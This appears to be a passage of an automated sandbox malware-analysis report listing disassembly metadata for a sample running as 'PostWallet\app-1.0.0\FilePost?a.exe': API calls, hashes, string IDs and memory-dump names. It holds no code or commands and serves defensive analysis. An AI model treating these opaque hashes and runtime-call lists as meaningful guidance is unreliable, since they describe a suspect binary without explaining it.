                                          • Instruction ID: 937e395703abf84facd926f128aa6a7690e3d0df9383046485bc7b3445b72100
                                          • Opcode Fuzzy Hash: e9e0e8129cd6660817b902a88b18f81df5f0c83517424cf9b0b277ef1c00be24
                                          • Instruction Fuzzy Hash: E131AFB5A002169FEF14CEEDA9807AD77F9EB09314F150564E924E7241F731EC46DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __TypeMatch.VCRUNTIME140(19930520,?,00000000), ref: 6E39732F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: MatchType
                                          • String ID: MOC$RCC$csm$csm
                                          • API String ID: 3879256720-1441736206
                                          • Opcode ID: 575861497c6171d50b7fb55445dbb98d76bfa401fdd57ca0dfbdc6efc15d476b
                                          • Instruction ID: d4a359c97abfbea607fbf0ed0c1b1bad34f859abf6ab7b4c62fb0515497bed20
                                          • Opcode Fuzzy Hash: 575861497c6171d50b7fb55445dbb98d76bfa401fdd57ca0dfbdc6efc15d476b
                                          • Instruction Fuzzy Hash: 0D318835810706DFEB748EA4C48079AB3B8EF40305F45096EDC91576D1E372EAA5EAE2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: 7d90a4b663c0d790ecc91aa3babcb84085f2c2825ad845b541a1592e8dcc04c5
                                          • Instruction ID: 92c28359aad97aecf2549cf14249b25591e626ec2ca80289e77ebe8dfc791e4d
                                          • Opcode Fuzzy Hash: 7d90a4b663c0d790ecc91aa3babcb84085f2c2825ad845b541a1592e8dcc04c5
                                          • Instruction Fuzzy Hash: 0221B7B2A45225BBDB328A24DD84B2B3778AF577B1F110111E975AB2A8D7F0D901C6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D185992: _free.LIBCMT ref: 6D1859B7
                                          • _free.LIBCMT ref: 6D185C94
                                            • Part of subcall function 6D17ACB9: HeapFree.KERNEL32(00000000,00000000,?,6D1799DC), ref: 6D17ACCF
                                            • Part of subcall function 6D17ACB9: GetLastError.KERNEL32(?,?,6D1799DC), ref: 6D17ACE1
                                          • _free.LIBCMT ref: 6D185C9F
                                          • _free.LIBCMT ref: 6D185CAA
                                          • _free.LIBCMT ref: 6D185CFE
                                          • _free.LIBCMT ref: 6D185D09
                                          • _free.LIBCMT ref: 6D185D14
                                          • _free.LIBCMT ref: 6D185D1F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: eb39591fd0f0be1efd17b95bc03b99b1438c6507ce2fa1df8b035add4231ff87
                                          • Instruction ID: 98d7233a01d41ac53a94abf632a9ed741fd3942db30502110dbf09bb57a4d2b6
                                          • Opcode Fuzzy Hash: eb39591fd0f0be1efd17b95bc03b99b1438c6507ce2fa1df8b035add4231ff87
                                          • Instruction Fuzzy Hash: AE115C31949B04BAEE30EBB0CC06FDBB7BC9F00714F418814B79F66066DBA6A5055A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6D17D232
                                          • __fassign.LIBCMT ref: 6D17D417
                                          • __fassign.LIBCMT ref: 6D17D434
                                          • WriteFile.KERNEL32(?,6D1739A1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D17D47C
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D17D4BC
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D17D564
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                          • String ID:
                                          • API String ID: 1735259414-0
                                          • Opcode ID: 08812ded7feae78fd883004daf477369c8279007f5b5ed84fadf85bbb845552d
                                          • Instruction ID: c4a9161b91da53ba53913e8c3eaad5ed42ac54977c8ab612d9bb30a0679cfb1b
                                          • Opcode Fuzzy Hash: 08812ded7feae78fd883004daf477369c8279007f5b5ed84fadf85bbb845552d
                                          • Instruction Fuzzy Hash: 73C19DB1D0425DCFCF11CFA8C8809EDBBB5AF49314F28416AE865BB255D7B1A942CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D16718B
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D1671F6
                                          • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D167213
                                          • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D167252
                                          • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D1672B1
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D1672D4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiStringWide
                                          • String ID:
                                          • API String ID: 2829165498-0
                                          • Opcode ID: 1da7ed38020e41def381325449513158cfb93cfd9b682dd8f812c7284be2ad48
                                          • Instruction ID: dccde82bf12c7e632b90a02047e2b96555ea2f10fd85dd0be5b9dd889dad6655
                                          • Opcode Fuzzy Hash: 1da7ed38020e41def381325449513158cfb93cfd9b682dd8f812c7284be2ad48
                                          • Instruction Fuzzy Hash: EF51A1B2910296AFEF118FA4CC44FAB3BB9EB55750F11851AF924D6558D7B4C820CB70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148537
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148559
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148579
                                          • std::_Facet_Register.LIBCPMT ref: 6D1485E8
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148604
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6D14864B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                          • String ID:
                                          • API String ID: 2081738530-0
                                          • Opcode ID: d36b53e4b7559f14a6909c417e30793221d0833b8083a96dff9645df957c54f4
                                          • Instruction ID: 3c17902f2bb4be5cdefd495ae6eed1ea33aa57192260005fd01353b13c44ed50
                                          • Opcode Fuzzy Hash: d36b53e4b7559f14a6909c417e30793221d0833b8083a96dff9645df957c54f4
                                          • Instruction Fuzzy Hash: 0341BE71E042588FCF01CFA8D584BAEBBB4FF09724F15819AD906AB345D7B4A944CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::operator+.LIBCMT ref: 6D17251E
                                          • DName::operator+.LIBCMT ref: 6D17252A
                                            • Part of subcall function 6D16CA50: shared_ptr.LIBCMT ref: 6D16CA6C
                                          • DName::operator+=.LIBCMT ref: 6D1725E8
                                            • Part of subcall function 6D170DB2: DName::operator+.LIBCMT ref: 6D170E1D
                                            • Part of subcall function 6D170DB2: DName::operator+.LIBCMT ref: 6D1710E7
                                            • Part of subcall function 6D16C97B: DName::operator+.LIBCMT ref: 6D16C99C
                                          • DName::operator+.LIBCMT ref: 6D1725A5
                                            • Part of subcall function 6D16CAA8: DName::operator=.LIBVCRUNTIME ref: 6D16CAC9
                                          • DName::DName.LIBVCRUNTIME ref: 6D17260C
                                          • DName::operator+.LIBCMT ref: 6D172618
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                          • String ID:
                                          • API String ID: 2795783184-0
                                          • Opcode ID: 6046cef6a55be3a6053b7c5769e45c79e9be5df2eb8e6a36931100fb4cbfa49d
                                          • Instruction ID: 5cf1b39e48348a6bd3d52f6645e852b52a6891ef70e330950bdd3d7d72184c72
                                          • Opcode Fuzzy Hash: 6046cef6a55be3a6053b7c5769e45c79e9be5df2eb8e6a36931100fb4cbfa49d
                                          • Instruction Fuzzy Hash: EF41DBB0A042859FDF21DF68C850BED7FF5EB0A308F414459E196E7258D7F45981C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148716
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148739
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148759
                                          • std::_Facet_Register.LIBCPMT ref: 6D1487CB
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D1487E3
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6D148806
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                          • String ID:
                                          • API String ID: 2081738530-0
                                          • Opcode ID: f3053600e3635283420d6fd93d6909913751346f5e0cf57c47ec99c4c847d0f3
                                          • Instruction ID: 657a7142e8085972882ccac2e56e5a002013ce51e09ca2f3e8b7b1374ecb3a70
                                          • Opcode Fuzzy Hash: f3053600e3635283420d6fd93d6909913751346f5e0cf57c47ec99c4c847d0f3
                                          • Instruction Fuzzy Hash: 3D41CEB1D0425ACFCF01CF94D990BAEBBB4FB05725F15825AD905A7344E7B4A940CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17262E: Replicator::operator[].LIBCMT ref: 6D17266B
                                          • DName::operator=.LIBVCRUNTIME ref: 6D17121A
                                            • Part of subcall function 6D170DB2: DName::operator+.LIBCMT ref: 6D170E1D
                                            • Part of subcall function 6D170DB2: DName::operator+.LIBCMT ref: 6D1710E7
                                          • DName::operator+.LIBCMT ref: 6D1711D4
                                          • DName::operator+.LIBCMT ref: 6D1711E0
                                          • DName::DName.LIBVCRUNTIME ref: 6D171232
                                          • DName::operator+.LIBCMT ref: 6D171241
                                          • DName::operator+.LIBCMT ref: 6D17124D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                          • String ID:
                                          • API String ID: 955152517-0
                                          • Opcode ID: f8ac069aa8106cf1846bea2abed415ea2d2b4614ee9d5d7e7957b5fb2339780d
                                          • Instruction ID: f9934f3a8d7b9a6d6bb12b3caf789fd310bef5e4c8517197282f821bc78c5965
                                          • Opcode Fuzzy Hash: f8ac069aa8106cf1846bea2abed415ea2d2b4614ee9d5d7e7957b5fb2339780d
                                          • Instruction Fuzzy Hash: 7A3192B5A052059FCB14CF98D460AEABFF9AF69304F10805DE696E7368EBB09544CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___unDName.LIBVCRUNTIME(00000000,?,00000000,6E397C80,6E397C90,00002800), ref: 6E397D6D
                                            • Part of subcall function 6E39EBF0: ___unDNameEx.LIBVCRUNTIME(?,00002800,6E397C90,6E397C80,00000000,00000000,?,?,6E397D72,00000000,?,00000000,6E397C80,6E397C90,00002800), ref: 6E39EC09
                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(-00000002), ref: 6E397DAC
                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000004,?,00000000), ref: 6E397DC9
                                          • InterlockedPushEntrySList.KERNEL32(?,?), ref: 6E397DEE
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6E397DF8
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6E397E01
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          Similarity
                                          • API ID: Name___unfree$EntryInterlockedListPushmallocstrcpy_s
                                          • String ID:
                                          • API String ID: 2809682464-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(00000001,?,6D16B410,6D167726,6D1679B7,?,6D167BEF,?,00000001,?,?,00000001,?,6D1A6BF0,0000000C,6D167CE8), ref: 6D16B4AE
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D16B4BC
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D16B4D5
                                          • SetLastError.KERNEL32(00000000,6D167BEF,?,00000001,?,?,00000001,?,6D1A6BF0,0000000C,6D167CE8,?,00000001,?), ref: 6D16B527
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, xrefs: 6D183ED5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                          • API String ID: 0-1657534680
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6D179178,?,?,6D179140,?,00000001,?), ref: 6D1791DB
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D1791EE
                                          • FreeLibrary.KERNEL32(00000000,?,?,6D179178,?,?,6D179140,?,00000001,?), ref: 6D179211
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,00346DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00346E36
                                          • UnloadUserProfile.USERENV(?,?,00000000,?,00346DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00346E51
                                          • CloseHandle.KERNEL32(?,00000000,?,00346DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00346E61
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(-00000001,?,00346DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00346E6F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          Similarity
                                          • API ID: free$CloseHandleProfileUnloadUser
                                          • String ID: P<kv
                                          • API String ID: 3143209300-4166494767
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6E3981ED,?,?,00000000,?,?,?,6E398318,00000002,FlsGetValue,6E3913F4,FlsGetValue), ref: 6E398249
                                          • GetLastError.KERNEL32(?,6E3981ED,?,?,00000000,?,?,?,6E398318,00000002,FlsGetValue,6E3913F4,FlsGetValue,?,?,6E3980A4), ref: 6E398253
                                          • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,api-ms-,00000007,?,6E3981ED,?,?,00000000,?,?,?,6E398318,00000002,FlsGetValue,6E3913F4,FlsGetValue), ref: 6E398268
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6E39827C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLastwcsncmp
                                          • String ID: api-ms-
                                          • API String ID: 3100911417-2084034818
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • _free.LIBCMT ref: 6D17CBE1
                                          • _free.LIBCMT ref: 6D17CBFA
                                          • _free.LIBCMT ref: 6D17CC38
                                          • _free.LIBCMT ref: 6D17CC41
                                          • _free.LIBCMT ref: 6D17CC4D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: _free$ErrorLast
                                          • String ID:
                                          • API String ID: 3291180501-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17FD6B: HeapAlloc.KERNEL32(00000000,00013385,00013385,?,6D1843D9,00000220,6D17D246,00013385,?,?,?,?,00000000,00000000,?,6D17D246), ref: 6D17FD9D
                                          • _free.LIBCMT ref: 6D17C57A
                                          • _free.LIBCMT ref: 6D17C591
                                          • _free.LIBCMT ref: 6D17C5AE
                                          • _free.LIBCMT ref: 6D17C5C9
                                          • _free.LIBCMT ref: 6D17C5E0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: _free$AllocHeap
                                          • String ID:
                                          • API String ID: 1835388192-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: operator+shared_ptr$NameName::
                                          • String ID:
                                          • API String ID: 2894330373-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6E39FB28,00000010,?,6E396353,#9n,?), ref: 6E3964B1
                                          • memmove.VCRUNTIME140(?,00000000,?,6E39FB28,00000010,?,6E396353,#9n,?), ref: 6E3964E9
                                          • ___AdjustPointer.LIBCMT(?,?,?,6E396353,#9n,?), ref: 6E396502
                                          • ___AdjustPointer.LIBCMT(?,?,?,6E39FB28,00000010,?,6E396353,#9n,?), ref: 6E396525
                                          • memmove.VCRUNTIME140(?,00000000,?,6E39FB28,00000010,?,6E396353,#9n,?), ref: 6E39652E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          Similarity
                                          • API ID: AdjustPointermemmove$abort
                                          • String ID:
                                          • API String ID: 2915871738-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E392E2E
                                          • _local_unwind2.VCRUNTIME140(?,000000FF), ref: 6E392F25
                                            • Part of subcall function 6E3942E0: _ValidateScopeTableHandlers.LIBCMT ref: 6E3943F4
                                            • Part of subcall function 6E3942E0: __FindPESection.LIBCMT ref: 6E394411
                                          • _CallDestructExceptionObject.LIBVCRUNTIME ref: 6E392EB0
                                          • _global_unwind2.VCRUNTIME140(?), ref: 6E392EBC
                                          • _local_unwind2.VCRUNTIME140(?,?), ref: 6E392EC9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          Similarity
                                          • API ID: _local_unwind2$CallDestructExceptionFindHandlersObjectScopeSectionTableValidate___except_validate_context_record_global_unwind2
                                          • String ID:
